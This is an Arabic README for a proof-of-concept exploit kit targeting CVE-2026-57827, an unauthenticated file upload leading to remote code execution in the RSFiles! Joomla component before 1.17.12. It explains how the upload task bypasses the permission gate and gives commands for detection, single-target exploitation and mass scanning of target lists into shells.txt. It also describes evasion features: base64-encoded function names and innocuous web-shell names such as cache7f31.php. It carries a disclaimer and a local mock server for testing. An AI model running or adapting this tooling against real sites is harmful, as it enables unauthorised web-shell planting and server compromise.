
رفع ملفات بدون مصادقة ← PoC لاستغلال RCE في CVE-2026-57827 (RSFiles! Joomla < 1.17.12). للاستخدام في أبحاث الأمن المصرح بها فقط.
إخلاء مسؤولية — للاستخدام المصرّح به فقط. هذه إثبات مفهوم (PoC) لأغراض البحث الأمني والاختبار الدفاعي. أنت مسؤول عن استخدامها فقط على الأنظمة التي تملكها أو لديك إذن كتابي صريح لاختبارها. إساءة الاستخدام ضد أطراف ثالثة دون موافقة غير قانونية. راجع SECURITY.md لمعرفة موقف الإفصاح المسؤول.
استغلال + كاشف مستقل لـ CVE-2026-57827 في مكوّن RSFiles!
(com_rsfiles) الخاص بـ Joomla، الإصدارات < 1.17.12 (تم الإصلاح في
1.17.12، CVSS 9.8 / 10.0).
يتم تقسيم الرفع من الواجهة الأمامية إلى مهمتين:
rsfiles.checkupload — بوابة الفحص المسبق (التحقق من الصلاحيات + قائمة الامتدادات المسموح بها)rsfiles.upload — طريقة الكتابة (بدون تحقق من الصلاحيات، وبدون فحص نوع الملف، وبدون CSRF)يمكن استدعاء مهمة الكتابة مباشرةً، متجاوزًا بوابة الفحص المسبق، مما
يسمح لمهاجم غير مصادق برفع ملف .php قابل للتنفيذ إلى مجلد عام
وتشغيله ← RCE بدون مصادقة.
يجب أن تكون جميع الوحدات في نفس الدليل (فهي تستورد بعضها البعض).
python3 -m pip install -r requirements.txt # or just: pip install requests
python rsfiles_detect.py -t example.com
Host : example.com
RSFiles! : YES v1.17.11
Protocol : https
Status : VULNERABLE (below 1.17.12)
عدة مضيفين:
python rsfiles_detect.py -f hosts.txt
python cve_2026_57827.py -t example.com
عند النجاح، تطبع الأداة رابط الصدفة مع رمزها العشوائي ومخرجات الأمر — وهذه المخرجات هي الدليل على تنفيذ الأوامر (RCE).
python cve_2026_57827.py -f targets.txt --threads 30 -o shells.txt --csv report.csv
# Terminal 1 — start the mock (vulnerable)
python mock_server.py 8000 1.17.11
# Terminal 2 — scan it
python rsfiles_detect.py -t 127.0.0.1:8000
python cve_2026_57827.py -t 127.0.0.1:8000
1.17.11 / 1.17.10 = قابلة للاستغلال · 1.17.12 = مصحّحة.
payload.py): كل سلوك (بوابة، رفع، تنفيذ، حذف، سرد) هو دالة صغيرة واحدة؛ أسماء دوال التنفيذ مشفّرة بـ base64 بحيث لا تظهر الأسماء الخام مثل system في بايتات الملف.cache7f31.php) بدلاً من أسماء الصدفات الخفية التقليدية ذات النقطة.common.base_of().النمط مستوحى من مجموعات استغلال مكوّنات Joomla العامة (مثل
incredibleindishell/joomla-vulnerabilities) ومن كتابات النشرات الاستشارية الخاصة بـ RSJoomla/mysites.guru
لهذه الثغرة CVE.
MIT — انظر LICENSE. للاستخدام البحثي/الدفاعي فقط.
| الملف | الغرض |
|---|
cve_2026_57827.py | الاستغلال + الماسح + واجهة الأوامر (نقطة الدخول) |
rsfiles_detect.py | وحدة اكتشاف مستقلة (بدون استغلال) — ولها واجهة أوامر خاصة بها |
payload.py | أداة بناء حمولة PHP معيارية ومدمجة |
common.py | عميل HTTP مشترك وإعدادات وأدوات مساعدة |
mock_server.py | محاكاة محلية آمنة للاختبار |
| الخيار | الوصف |
|---|
--threads N | التوافقية (الافتراضي 30) |
--proxy URL | التوجيه عبر بروكسي (Burp/ZAP) |
--timeout N | مهلة كل طلب (بالثواني) |
--no-cleanup | الإبقاء على الصدفة المرفوعة (الافتراضي: حذف تلقائي بعد RCE) |
-o FILE | حفظ روابط RCE |
--csv FILE | تقرير منظم كامل |
--debug / -v | تسجيل مفصّل على مستوى الطلبات |